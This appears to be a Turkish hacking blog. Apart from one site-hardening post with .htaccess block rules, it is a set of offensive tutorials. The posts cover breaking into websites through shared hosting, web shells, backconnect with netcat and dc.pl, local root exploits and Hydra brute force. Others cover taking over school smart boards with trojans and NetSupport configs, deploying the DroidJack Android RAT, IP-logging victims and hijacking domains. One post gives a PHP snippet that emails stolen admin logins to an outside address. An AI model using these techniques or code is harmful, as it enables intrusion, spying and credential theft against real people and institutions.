15 Ekim 2016 Cumartesi

Güvenli Web site Oluşturma


Merhabalar, bu konuda uygun fiyata site güvenliği nasıl sağlanıldığını anlatacağım.

Öncelikle site güvenliğimiz için güvenli domain firması seçiyoruz. Domain firması bizim web  sitemize erişebiliyor.
 Türk domain firmalarından satın alırsak hem daha pahalı hem güvenliğimizi azaltacağı için direk ana  bayi den satın alıyoruz.
Ben godaddy üzerinden anlatacağım.
 tr.godaddy.com adresinden domain adımızı yapıp sepete ekliyoruz.
 Domain satın alırken admin e-maili çok önemlidir aa.com sitesinin admin e-mail adresi domain@site.com olursa site.com sitesine erişilip mail paneline erişildiği taktirde aa.com sitesine erişilir.
 Bu yüzden alan adımızla eşleşen e-mail satın alıp info@aa.com admin@aa.com gibi e-mail satın alıp admin mail adresimize ekliyoruz. Veya sunucu satın alırken mail satın alabilirsiniz.
 Whois bilgilerimizi gizlemek site güvenliğini arttırır. Telefon numaranızı- adres bilgilerinizi gizler.
 domain süreniz dolduğunda aynı alan adı ile domain açılmaz vs.
 Daha sonra domain satın alıp hosting işlemlerine geçelim.
 Basit bir hosting satın alırsak sunucuda bulunan diğer sitelerden hedef siteye erişebilir.
 Sunucu satın alıp site.com'a ait dns veriyor.
 örn: ns1.site.com  ns2.site.com
 Satın aldığımız zaman serverda tek site olduğu için diğer sitelerden girip sitenizi hackleyemezler.
 site.org site.info gibi birçok site kuracaksanız her bir siteye yeni bir ip adresi alın.
 Daha sonra sitemize uygun script seçelim. Mümkünse scripti kendimiz kodlayalım (Güvenliği arttırır)
 400$ vBulletin scripti sürümlerinde bile güvenlik açığı görülebiliyor.
 Scripti kurduktan sonra ip üzerinde ftp-ssh-mysql-mssql hesapları kuracaksanız şifrenizin güvenliği çok önemlidir. 1milyarlık şifre kelimesinin içinde bile olmayan şifreler seçin.
 Veritabanı kesinlikle güçlü bir şifreleme ile saklanmalıdır.
 Sitenizin admin panelini kesinlikle gizli tutun. Gerekirse subdomain açıp sadece localhosta erişim verin. 2082 ve 2083 portu kapalı olsun.
  Sunucunuzdaki sitenizde açık tarama programlarını imha etmek için .htaccess dosyasına kodları yapıştırın.

RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} Acunetix [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule> 

 Xss açıklarını engellemek için .htaccess dosyasına kodları yapıştırın

RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php|forum.php|yaz.php [F,L]


 SQL İnjection engellemek için .htaccess dosyasına kodları yapıştırın

 RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{REQUEST_URI} ^/(,|;|<|>|/{2,999}).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww|curl|wget|python|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{HTTP_COOKIE} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\\.0\\.0\\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} [^a-z](|order|union|declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
RewriteRule (.*) - [F] 

 Bu kodlar Sql ve Xss açıklarını filtreler. Çoğu exploit çalışmaz. Bypass yapılabilir fakat zordur.

Not: Web sitenize her cihazdan ve ağdan giriş yapmayın. 
 
 Herşeyi halledip keylogger & trojan yemezsiniz herhalde :)



27 Eylül 2016 Salı

Hedef siteye erişme (Hackleme)


 Merhaba arkadaşlar, bu konuda hedef siteye 8 farklı methodla erişmeyi göstereceğim.

1.) Web uygulama açıklarını bulup siteye erişmeye çalışıyoruz. SQL injection, Blind sql injection,
Admin Login injection, Remote Code Execute(Rce), Remote Command Execute, Cross Site Scripting, Cross-Site Request Forgery ,Bof, Lfi , Rfi gibi açıkları bulup exploit ediyoruz.
Site hazır script kullanıyorsa scriptin sürümünü öğrenip exploit-db.com 0day.today  gibi
 Exploit sitelerinden exploit bulup exploit ediyoruz.
 Güvenlik açığı bulmak için hazır scriptleri kullanmanıza gerek yok tüm açıklıkları en ince
 ayrıntısına kadar inceleyin sonra manuel olarak açıklıkları nasıl buluyorsanız programa dökün. premium açık tarama programlarından daha iyi sonuç verecektir : )
2.) Hedef sitede güvenlik açıkları yok ise whois çekip sitenin kullandığı nameserverlara bakıyoruz veya ip adresini öğrenip bing de ip: şeklinde taratıp ip uzerindeki diğer siteleri buluyoruz. örnek: sitenin ip adresi 111.111.111.111 olsun bing.com dan ip:111.111.111.111
 Şeklinde taratıyoruz veya who.is/nameserver den whois sonucu cıkan nameserverleri yazıp serverdaki diger siteleri görebiliyoruz. 
ip aralıklarındada aynı aynı serverda olan sitelere rastlanabiliyor.
 https://ct-scorpi10.blogspot.com/2016/09/web-sitesinde-ip-aralklar-taramas.html
 Siteleri listeledikten sonra aynı sitelere 1.methodu kasıyoruz. Her sitede güvenlik açığı    arıyoruz aynı serverdaki siteye erişdiğimizde ise servera shell atıp local root exploitleri ile 
  serverda root oluyoruz veya webr00t shell ile config okuyup serverdaki diğer sitelere  erişebiliyoruz. 2methotda olmadıysa  webr00t shellin cgitelnet shellini çalıştırıp cat  /etc/passwd komutunu giriyoruz. Serverdaki tüm kullanıcıları gösterir. Genellikle site isimleri gibi kullanıcı adları olur.
 örn: portwood:*:11401134:100450:portwood:/home/content/34/11401134:/sbin/nologin
 portwood kullanıcısının sitesi portwood.com .org olma olasılığı yüksektir. Configde gördüğümüz gibi sitenin dizini  /home/content/34/11401134 cd komutu ile servarın dizinine gidiyoruz. İzinler yok ise chmod izni yok ise ;
 https://ct-scorpi10.blogspot.com/2016/09/chmod-change-mod-nedir.html
 konudan chmodu öğrenip bulunduğunuz dizine perm yetkisi verip sitenin bulunduğu dizine erişip indexinizi upload edebilirsiniz.
3.) who.is den sitemize whois çekiyoruz Sitenin admin e-mail adresini bulup 1 ve 2. methodları admin e-mail sitesine kasıyoruz. Admin e-mailin bulunduğu siteye eriştiğimiz zaman yönetim panelinden mail panelini bulup mailin şifresini alıp domain firmasından şifremi unuttum çekip hedef siteye erişebiliyoruz. Eğer mail panelini bulamassanız sitedeki bir php veya asp dosyasını editleyip SQL injection oluşturulabilecek kodları başa girip sqlninja,sqlmap ile veritabanı çekip mailin şifresine erişebiliyoruz : )
4.) Bu methodda ise serverın bulunduğu siteye whois cekip nameserverlarına bakın site ile aynı serverda olmayabilir 1.3 methodları uyguluyoruz serverin bulundugu domaine erişirsek nameserverları kontrol edip hedef siteye erişebilirsiniz veya domain süresi bitmeye yakın ise bittiği gün aynı domain ismi ile 1and1.com dan 1dolara domain alıp 1yıllık index basabilirsiniz :) 
 Hedef sitemiz domaini türk sitelerinden satın almışsa örn:alastry.com yoncu.com gibi sitelerden almış ise pdr nin bayiliğini yapıyor yani yoncu.com sitesi veya publicdomainregistry.com 2siteden birine 1,2,3 deki methodları uygulayıp erişirseniz  domain panelinden hedef siteye erişmiş olursunuz.
5.) Siteye ctrl+u tuşu ile sayfa kaynak kodlarına bakıyoruz kullandığı scripte bakıp wordpress ise wordpress.com sitesine 1den 4 e kadar tüm methodları uyguluyoruz. 
 Mybb ise mybb nin sitesine vb.
 Hazır script sitelerine erişmek zor olsada eriştiğinizde hedef siteye erişebilirsiniz.
6.) Nmap ile sitede açık portlara bakın 1433 MsSQL 3306 MySQL  3050 gbs_db veya 1521 Oracle portlarından birtanesi açık ise ki localhostda değilse veritabanı için bu portların açık olması şart. açık olan porta ddos atıp database hatası verecektir. Hatanın verdiği ip adresine tüm methodları kasıp SQL yi dump ederseniz veritabanı bilgileri ile hedef siteye erişmiş olursunuz.
7.) Serverda  navicat, Firezilla gibi programlar  kulanılıyorsa kullanıldığı programın exploiti bulup erişebilirsiniz 
 örn: http://0day.today/exploits/25371
veya navicat gibi programların bağlı olduğu ip ye methodları kasın eriştiğinizde navicat yönetim panelinden hedef site admini ip adresi port numarası şifresi girdiğinde shell üzerinden loglayıp siteye erişebilirsiniz.
8.) Xhydra ile serverdaki ftp veya ssh hesaplarına brute force uygululuyoruz.
 Terminali açıp hydra -s 21 -v -V  -l kullanıcı adı eğer kullanıcı adını bilmiyorsanız -L olacak
 -P şifre wordlist dizini ftp://ip adresi şeklince komutu giriyoruz.
 örn: hydra -s 21 -v -V -L root/Desktop/kadları -P /root/Desktop/wordlist.txt ftp://78.143.98.210
 şeklinde komutu girip saldırımızı yapıyoruz.
 Serverdaki herhangi bir ftp hesabının şifresini alıp firezilla ile bağlanıp chmod 777 yaparak anadizine shellimizi upload ediyoruz. 2.methothodu kasıp serverdaki hedef siteye erişiyoruz.
 Methodları anlatmam 1saatimi aldı kaynak belirtmeden çalana hakkımı helal etmiyorum. 
 Siber Yazılımcı Grubuna Özel yazılmıştır





23 Eylül 2016 Cuma

Akıllı tahtaya erişme (hackleme)

Merhaba arkadaşlar bu konuda akıllı tahtaya remote (uzaktan) nasıl erişildiğini anlattım.

 Öncelikle anlatacağım işlemleri yalnız veya samimi arkadaşlarla yapın.
 örn: Beden dersinde, ve çıkış zilinden 5-10dakika sonra gibi süre içinde yapabilirsiniz
 Akıllı tahtalarda deepfreeze var ise görev yöneticisinden veya sağ alt kısımda deepfreeze ye sağ  tıklayıp kapatın aksi taktirde yapacağınız işlemler bilgisayar yeniden başlatana kadar sürecektir.

 1.) Usb rubber ducky methodu ile akıllı tahtaya 15sn içinde takıp çıkarın sonra kendi bilgisayarınıza   takın usb linux ise linux komutları ile akıllı tahtaya erişebilirsiniz.

  https://www.facebook.com/hackerowl/photos/a.1417176048298381.1073741828.1414225218593464/1464900250192627
  Facebook sayfamda usb nin nasıl hazırlanacağını anlattım.

 2.) Önce spy-net & Darkcoment gibi uygulamalar ile trojanımızı oluşturuyoruz.
     Oluşturduğumuz trojan(rat) telefonumuza yükleyip zip yapıyoruz.
     Rat bilmeyen varsa konuya edit yapıp anlatacağım.
      Akıllı tahtaya Alpemix veya Teamwiever gibi uygulamalar yüklü ise açıp ıd şifreyi alıp            telefondan ziplediğimiz trojanı akıllı tahtaya sürükleyip unzip yapıyoruz ve trojanı kolaylıkla yutuyor!
 Trojan yedirmek istemeyen arkadaşlar için exploitde kullanabilirler.
 örn: 0day.today/exploit/25390
 3.) Alpemix veya Teamwiever gibi uygulamalar kurulu değilse trojanımızı herhangi bir upload  sitesine upload ediyoruz.
  Akıllı tahtadan trojanı indirip çalıştırabilirsiniz.
 Ancak!
 Trojan yedirdikten sonra restart sonucu trojan kayboluyorsa deepfreeze vb. uygulamaları denetim masası veya görev yöneticisinden devre dışı bırakmamız gerekiyor.
4:) f@tih ağına bağlanın password: !1qaz2WSX3edc4RFV%56 Bağlandıktan sonra
 Androidde: Zanti Dsploit gibi uygulumalarla sniff çekip akıllı tahtaya erişebilirsiniz.
 Linuxda : SniffJoje & Wireshark & Dsniff... gibi uygulamalarda sniffing yapabilirsiniz.

5.) Akıllı tahtada Netsupport uygulaması var ise ki %99 olması lazım
  Evde bilgisayarınıza Netsupport kurun.
  Kurduktan sonra Netsupport tech Console kısmından Licensee kısmına gelip serial numberi    kopyalıyoruz.
  nssadmui.exe/Netsupport client32.ini dosyasını config ayarımızı yapıştırıyoruz.
 örnek ; 
  [Client]
_present=1
Password=1148745314
Protocols=2,3
RoomSpec=VESTEL
SecurityKey=GD<DAMDO9N?HDFGK;O@JCL9B=PBKGL
UnloadMirrorOnDisconnect=1
Usernames=*/1148745314

[_Info]
Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini

[Audio]
DisableAudioFilter=0

[General]
Password=EM:B>LDFHI<NAIEN:K>CAGFI<C@JEP

[HTTP]
GatewayAddress=88.249.193.13:443
GSK=HD<E@GDOHB;H@LEM;F?NDM9G>GCMHK
SecondaryGateway=88.249.194.108:443
SecondaryPort=443

kodları yapıştırıp Bilgisayarınızdan netsupport programı ile akıllı tahtaya erişebilirsiniz.
 Siz kendiniz config dosyasınızı kendinize göre düzenleyin

 Not : Akıllı tahtalar flash bellek ile açılıyorsa pardus ile çalıştırıp msconfig ile windowsa geçiş yapın.

 Netsupport İndirme Linki : https://cloud.mail.ru/public/0fc4747b6a6c/NSS11TR.rar








18 Eylül 2016 Pazar

Chmod (Change mod) Nedir?


Chmod linux serverlarda erişim iznini ayarlayan mod dur.
 Chmod ayarı sayesinde serverdaki dosyalara okuma-yazma-değiştirme gibi yetkiler kullanıcılara göre ayarlanabilir.

 chmod 644 dosyalarda sadece okuma yetkisi bulunmaktadır.
 chmod 755 dosyalarda okuma ve çalıştırma yetkisi bulunmaktadır.
 chmod 777 dosyalarda ise okuma, çalıştırma ve yazma izni olur.

 chmod 644 ve 755 olan dosyalarda yazma izniniz yoktur.
 Dosya ve klasöre chmod ayarını 777 ayarlamak için
 chmod- 777- klasör adı-  şeklinde servera komut girerek klasöre full yetki verebiliriz.
 örn : chmod 777 .htaccess

 tüm klasörleri 777 yapmak için,
 for i in `find . -type d`; do chmod 777 $i; done

 tüm dosyaları 755 yapmak için,
for i in `find . -type f`; do chmod 755 $i; done

tüm dosyaları 644 yapmak için,
for i in `find . -type f`; do chmod 644 $i; done

 php uzantılı dosyaları 644 yapmak için,
find . -type f -name '*.php' -print0 | xargs -0 chmod 0644

  Komutunu giriyoruz.

  find / -type f -perm -2 -ls / Serverdaki tüm yazılabilir dosyaları bulur.

find . -type d -perm -2 -ls / Bulunduğunuz dizindeki tüm yazılabilir dosyaları bulur.

16 Eylül 2016 Cuma

Android Telefon Hackleme (DroidJack)


  Rat ile Android Telefonların nasıl hacklenebildiğini anlatıcağım.
  Aşağıda vereceğim programı indirip kuruyoruz.
  Duckdns.org dan  kayıt oluyoruz facebook & gmail hesabınız varsa direk bağlanın.
  Subdomain oluşturuyoruz ve işletim sistemine uygun programı bulup indiriyoruz.
  Duckdns programına sitedeki tokeni yazıyoruz ve bağlanıyoruz.
  Droidjack'a gelirsek generate apk kısmında  subdomain adresimizi ve açacağımız port u yazıyoruz.
  örn: scorpi10.duckdns.org port da 1604 portunu öneririm.
  Modem arayuzunden portumuzu açtıktan sonra Generate seçeneğine tıklayıp apk yı oluşturuyoruz.
  Devices bölümünden 1604 portumuzu dinliyoruz.
  Hedef kişiye oluşan apk yı yedirdiğimizde telefonu restart yaptıktan sonra bağlantıyı alacağız.
  Bağlantı geldikten sonra sağ tıklayıp telefonu dinleyebilir, sms leri okuyabilir, ön ve arka kamerasını   İzleyebilir, telefon numarasını ve imei numarasını öğrenenip rehberini kopyalayabilir,
  İstediğiniz kişiyi arayıp sms atabilirsiniz.

  İndirme Linki : http://www.mediafire.com/download/z830ija4ou2c81b/DroidJack.4.4._ed.rar
 

Wordlist (Parola Listesi) Hazırlama aracı Crunch


 Brute force yaparken parola listesi lazım olduğu için ve sağlam listeler aramak çok zamanımızı alır.
 Aramak yerine size nasıl wordlist yapıldığını anlattım.
 Not: Tool sadece Kali linuxda çalışmaktadır.
 Öncelikle Terminali açıp crunch yazıyoruz.
  crunch en az uzunluk - en fazla uzunluk - şifre kombinasyonu -o dosya ismi şeklinde olacaktır.
   Örn: crunch 4 7  1234567 -o sifreler.txt  komutu giriyoruz.
  en az 4 haneli en fazla 7 haneli 1234567 kombinasyonunu karıştırarak wordlist hazırlayacaktır.
  kelime ve sayı  wordlisti hazırlamak istiyorsak ;
  Örn: crunch 4 16 qwertyuıopğüasdfghjklşizxcvbnmöç123456789 -o şifreler.txt
  Şeklinde girdigimiz taktirde brute force yaparken kırma oranı  %95 a kadar çıkabiliyor.





13 Eylül 2016 Salı

Sunucudaki sitelerden Hedef siteye geçiş


   Hedef site hacklemenin bir diğer methoduda aynı sunucudaki siteleri hackleyip hedef siteye geçiş   sağlamaktır.

 Bu konuda Sunucudaki sitelerden hedef siteye nasıl erişilebildiğini anlattım.

  ct-scorpi10.blogspot.com/2016/09/hedef-sitenin-sunucusundaki-siteleri.html
  Öncelikle linkdeki konuda sunucudaki sitelerin listelenmesine bakıp sunucudaki siteleri listeleyiniz.
  https://ct-scorpi10.blogspot.com/2016/09/web-sitesinde-ip-aralklar-taramas.html
  linkdeki konudan ip aralıkları taraması yapıp siteleri txt dosyasına kaydedin.
  Veya sitenin nameserverlarını öğrenip sunucuya whois cekip siteleri çekebilirsiniz.
  Kaydettiğiniz sitelerde web güvenlik açıklıkları taratın.
  Sunucudaki sitelerden birinde mutlaka güvenlik açığı bulunacaktır.
  https://ct-scorpi10.blogspot.com/2016/09/hedef-sitede-admin-panel-nasl-bulunur.html
  Açığı bulduğunuz siteyi exploit edip
  ct-scorpi10.blogspot.com/2016/09/hedef-sitede-admin-panel-nasl-bulunur.html
  Admin paneli bulup sunucuya shell atın.
  https://ct-scorpi10.blogspot.com/2016/09/safe-mod-kapatma-off-islemleri.html
  Linkdeki anlattığım konudan safe modu kapatın.
  https://ct-scorpi10.blogspot.com/2016/09/kali-linux-uzerinden-weevely-ile.html
  Linux kullanıcıları weevely uzerinden
  https://ct-scorpi10.blogspot.com/2016/09/dcpl-exploiti-ile-backconnect-olma.html
  Windows kullanıcıları dc exploiti ile backconnect olsun.
  Backconnect olduğunuz sunucuda uname -a komutu girip serverın kernel surumunu öğrenip
  Kernel surumune uygun local root exploit buluyoruz.
  0day.today & exploit-db.com dan
  Bulduğunuz exploiti wget -r komutu ile çekip çalıştırıp root olabilirsiniz.
  Root olduğunuz sunucuda hedef sitenin dizinine gelip index dosyanızı upload edebilirsiniz.

Konu çok uzun olduğu için sadece 1methodu anlattım. İstek geldiği surece diğer methodları anlatıcağım.



 

Karşıdaki kişinin ip adresi tespiti


    Merhaba Arkadaşlar

  Bugünkü konuda karşı kişiye fotograf atarak ip adresi nasıl öğrenildiğini anlattım.

  hizliresim.com dan fotograf yukluyoruz.
  iplogger.org sitesinden short link bölümünden yukledigimiz fotografın urlsini yazıyoruz.
  iplogger in verdiği url yi bitly.com dan kısa link haline dönüştürüp kurbana atıyoruz.
  kurban linke tıkladığında iplogger.org sitesine ip adresi geliyor.
 
 Ancak!
 Konum tespiti yapmak istiyorsan teamspeakın özelliğinden ip adresini yazıp şehrine kadar bulabiliriz.

Facebookda E-mail Adresi Öğrenme


 Facebook hacklerken e-mail adresini öğrenmek bir nevi işimizi kolaylaştırır.
 Bu nedenle size 2 şekilde e-mail adresi bulmayı öğreteceğim.

1.)Hello
2.) Yahoo



  1:]  Telefonumuza hello uygulamasını indiriyoruz sonra facebookdan giriş yapıyoruz.
       Kişilerimden Facebook hesabını bulup tıklıyıp e-mail adresini ve telefon numarasını öğreniyoruz


  2:] Yahoo.com adresine gidiyoruz. Kaydol seçeneğine basıyoruz.
        Kaydolduktan sonra mail butonuna tıklayın.
        Sayfanın en altındaki kişiler butonuna tıklayın.
        Açılan sayfanın sağ tarafındaki Facebookdan içeri aktar butonuna tıklayın.
      Açılan sayfa sizden facebook ile giriş yapmanızı istiyor Tamam butonuna basın.
      Yahoo arkadaş listenizdeki E-mailleri bulmaya başlıyacaktır :)


  Not: E-mail adresini ayarlardan gizleyen e-mail adreslerine ulaşamassınız.
       

Domain Hack

 Merhaba Arkadaşlar, Bu konumda domain hackı anlatıcağım.
 Aşağıda Yazdığım methodları deneyip başarılı olursanız siteye kalıcı index bile atabilirsiniz.

 Burada domaine sahip olmak için 4 methodu anlatıcağım.

 1.) Öncelikle Hedef sitemize whois çekiyoruz domain süresi bittiği anda aynı adla domain alırsanız
  Web sitesine legal olarak  kalıcı index atabilirsiniz domain sizin olur :)

  2.) Siteye whois çekip Alan adını (Domaini) hangi siteden aldığına bakın genelde reseller olur.
     örn:https://who.is/whois/siber2071.org
     siber2071.org domaini yoncu.com dan almış.
     Name kısmında PublicDomainRegistry.com adresi yazıyor.
      Yani Yoncu.com reseller (Bayi) PublicDomainRegistry.com  İse Ana bayi oluyor.
        2siteden birine erişirseniz Domaine sahip olursunuz.

  3.) Sitenin kayıtlı e-mailine bakıyoruz.
      Eğer kayıtlı e-maili hotmail-gmail-yahoo gibi mail ise xhydra  kullanıp hacklemenizi oneririm.
      Sonraki konularımda xhydra yı anlatacağım.
      Özel bir site ise aa.com gibi siteler ise o siteyi hacklerseniz sitenin domain firmasından şifremi           unuttum çekip domain ismini ve e-maili yazın ve hesaba girin.
      Domaini kendi üstünüze yapabilirsiniz.

  4.) Web uygulama açıklıkları veya serverdan hacklediğiniz
       Web sitesinin dizinine gidip admin paneli bulun ve bu kodları arasına editleyin;
   
       $kime="ct-scorpi10@gmail.com";
$baslik="site şifreleri";
$Scorpi10.="UserName : ".$_POST[’vb_login_username’]."\\r\\n";
$Scorpi10.="şifre : ".$_POST[’vb_login_md5password’]."\\r\\n";
$Scorpi10.="Avlanan Site : " .$_SERVER[’HTTP_HOST’]."\\r\\n";
mail($kime, $baslik, $Scorpi10);     
       Verdiğim kodları edit yaparak kendi e-mail adresinizi ve başlığı yazın.
       Admin e-mailden giriş yapınca domain firmasına girip şifremi unuttum çekin.
       Ve domaini kendi e-mail adresine geçirip domaine sahip olabilirsiniz.
 
 

11 Eylül 2016 Pazar

Dc.pl Exploiti ile Backconnect Olma



  Öncelikle web sitemizde herhangi shell bulunması lazım.
  Biz r57 shell üzerinden ilerliyeceğiz.
  Netcat ile açık olan portumuzu dinliyoruz.
  nc.exe nin masaüstünde olduğunu farzedelim. cd desktop - nc.exe
   nc -vv -l -p 443

  Konunun altından vereceğim exploiti indirip servera upload ediyoruz.
  Sonrasında komut satırına "perl  dc.pl  ip adresi port numarası" komutu yazıcağız.
  örn: "perl dc.pl 123.123.123.123 443"   komutu giriyoruz ve backconnectiz :)

 
  Exploit Kodları : http://pastebin.com/VcAAk2PC

Hedef sitede ait Alt alan adlarının (Subdomain) bulunması

   Bu konumda sizlerle Sub domain leri bulma konusunu ele alacağız.
   Bir sitenin subdomain lerinleri bulmanın bir cok yolu vardır.
   Ama benim size önermek istedim daha gözel bir tool vardır. Tool ismi The Harvester .
  Kali linux üzerinde kurulu gelen bu program işinizi çok kolaylaştıracaktır.
 Bu tool sayesinde hem subdomain leri hemde sitenin mail adreslerini bula bileceksiniz

 Ben bu gün meb.gov.tr sitesini taratacam. -d yazan yere sitemizin domain adresini yazıyoruz.
 Ben ilk 500 arama içinden çıkan domain leri listelemesini istedim.
 Siz daha fazla ve ya daha az seçe bilirsiniz.
 Ama unutmayın rakam ı yükselttikçe tarama sureside uzar. Ever programı başlatıp bekliyoruz.



    Gördüğünüz gibi meb.gov.tr e ait tüm alt alan adlarını buldu.

Safe Mod Kapatma (Off) İşlemleri

  Shell attığımız serverda backconnect olabilmek için Safe mod on ise off yapmamız gerekiyor.
  Safe mod u 2 şekilde kapatmayı anlatıcağım.
  

  1.) php.ini
  2.)php4



   1:]  Yeni dosya oluşturun php.ini adında.
         Oluşturduğunuz dosyanın içerisine safe_mod = Off; 
        Kodunu ekleyin sonrasında shell uzerinden anadizine upload edin.
        Safe mod on ise off olacaktır.
        Shell üzerinden upload edilmiyorsa echo komutu ile upload edebilirsiniz.
        echo komutuda işe yaramadıysa wget -r komutu ile dosyanın yolunu gösterip çekin.
        


    2:] servera 2.shellimi upload ediyoruz.
         örn:1.shellimiz r57 olsun 2.shellimiz b374k 
          b374k shell uzerinden r57 shellin dizinini buluyoruz.
          Actions kısmından renameye basıyoruz.
          sonrasında r57.php dosyasına 4 sayısını ekliyoruz. örn: r57.php4
    

   

Kali linux üzerinden weevely ile backconnect olma.

Kali linux dan Terminali açalım.
 Weevely 
 komutunu girelim.
  weevely generate Scorpi10 /root/Desktop/bc.php 
  Komutunu girdikten sonra Masaüstü dizininize bc.php dosyası gelecektir.
  Shell üzerinden bc.php yi upload ettikten sonra backconnectiz :)
  Scorpi10 bizim şifremiz oluyor yerine başka birşeyde yazabilirsiniz.

Web sitesinde İp aralıkları taraması


  Sunucu veya sitenin ip aralıklarını taratırken tek tek taramak zor olduğu için programını vericeğim.
  örn:123.123.123.123 ip adresini 123.123.123.1-255 e kadar tarar.
  hangi ip adresinde site bulursa hedef site ileaynı sunucudan olma olasılıgı yuksektir.
  Aynı sunucuda olduğunu anlamak için siteye whois cekin aynı nameserverları aynı sunucuda ise aynı sunucudadır.

  Çok büyük sitelerin ip aralıklarını tarattığımda çıkan tüm ip deki sitelerin aynı sunucuda olduğunu     gördüm.
  Örn: aliexpress.com

   İndirme linki: http://turksec.info/downloads/binger.rar

Hedef sitede admin panel nasıl bulunur?


 Merhabalar Arkadaşlar, Bu konumda Web sitesinin admin panel bulma methodlarını anlatacağım.

  Aşagıda linkini vereceğim programı çalıştırıp sitenin  linkini yazıp sabitliyoruz sonra admins.txt
  Metin dosyamızı açıyoruz sonra tarama işlemini gerçekleştiriyoruz.
  Program admin panelini bulamadıysa admin paneli alt dizinlerde olmayabilir.
  Admin paneli subdomainde olabilir örn: webadmin.site.com gibi.
  Yada Sitenin ip adresi filtrelenip gerçek ıp adresini saklıyor olabilir.

   https://ct-scorpi10.blogspot.com/2016/09/cloudflare-sunucusu-kullan-web.html
   Burada ip adresi bypass yöntemlerini anlattım.
 Sitenin ip adresini bulursanız Cpanel kullanma ihtimali çok yuksektir 2082 ve 2083 portlarına bakın.


   Bir sonraki konumda Hedef sitenin subdomainlerinin bulunmasını Anlatacagım.



İndirme Linki: http://turksec.info/panelBul.rar  


 

 

Hedef Sitenin Sunucusundaki Siteleri Listeleme


Merhaba Arkadaşlar, Bu konumda Web sitesinin sunucusunda bulunan diğer siteleri bulma yöntemini anlatacağım.


  Öncelikle  yougetsignal.com/tools/web-sites-on-web-server  url adresine giriyoruz.
   Sitemizin adını yazıp check yapıyoruz.
   Sonra Sitenin ip adresini ve ip deki diğer siteleri bulacaktır.
    İp adresimizi alıyoruz örn: sitemizin ip adresi 222.222.222.222 olsun.
   Bing.com adresine giriyoruz.
   ip:222.222.222.222 yazarak ipdeki diğer siteleri görüntülüyoruz.
   Sunucudaki sitelerin hepsi aynı ipde olmayabilir.
    222.222.222.1-255 ip aralıklarını hepsini taramakta fayda var.
   
  Sunucu sitelerin ip adresine göre filtre yapmış ise who.is adresine giderek sitemize whois cekiyoruz.
 Sitenin nameserver'larını who.is/nameserver adresinden nameserverlara whois cekiyoruz.
 Whois sonucunda çıkan siteler sitenin sunucularındaki diğer sitelerdir.


Wordpress Açık Tarama aracı (Wpscan)


  Web sitenin wordpress olduğunu anlamak için sitenin sonuna /wp-login.php ekleyin açılıyorsa
   site wordpressdir. Veya ctrl+u ile kaynak kodlarını görüntülediğinizde anlarsınız.

   Örnek sitemiz: www.demirsigorta.com.tr olsun.

  Bu araç sadece linux işletim sisteminde çalışmaktadır.
  Terminale;
 wpscan ./wpscan.rb --url  www.demirsigorta.com.tr
 Komutu  Hedef sitenin teması, versiyonu ve plugin bilgilerini verir.

  wpscan ./wpscan.rb --url  www.demirsigorta.com.tr  --enumerate p
  Hedef sitedeki pluginleri ve açıklıkları tarar.

   wpscan ./wpscan.rb --url  www.demirsigorta.com.tr  --enumerate u
   Hedef sitedeki kullanıcı isimlerini bulur.

   wpscan ./wpscan.rb --url  www.demirsigorta.com.tr  --enumerate t
   Hedef sitede tema açıklarını tarar.

  wpscan ./wpscan.rb --url  www.demirsigorta.com.tr  --enumerate tt
  Sitenin açıklıklarına exploit bulur.






 

Cloudflare sunucusu kullanan web sitesinin ip adresini öğrenme

 Öncelikle web sitenin cloudflare kullandığını anlamak için who.is adresine gidiyoruz.
  web sitesinin url adresini yazıyoruz. Nameserverları clodflareye bağlıysa cloudflare kullanıyordur :)

Nameserverları Cloudflare sunucularına bağlı olan Web sitesinin ip adresini öğrenmenin 3yolu vardır;

   1.) yougetsignal.com/tools/web-sites-on-web-server adresine gidelim.
        sitemizin adresini yazalım ve bulduğu ip adresini url ye yazıp açalım.
        Eğer ıp adresi görüntülenebiliyorsa sitemizin gerçek ip adresidir.
  

   2.)  www.dnsstuff.com sitemize girelim. 
      
     DNSreport: bölümüne sitemizin ip adrresini yazalım. 
     Bulunan ip adresi görüntülenebiliyorsa sitemizin ip adresidir.


   3.) Web sitenin sahibi imiş gibi Cloudflare sitesine giriş yapıyoruz.
        Web sitemizin raporlarını istiyoruz.
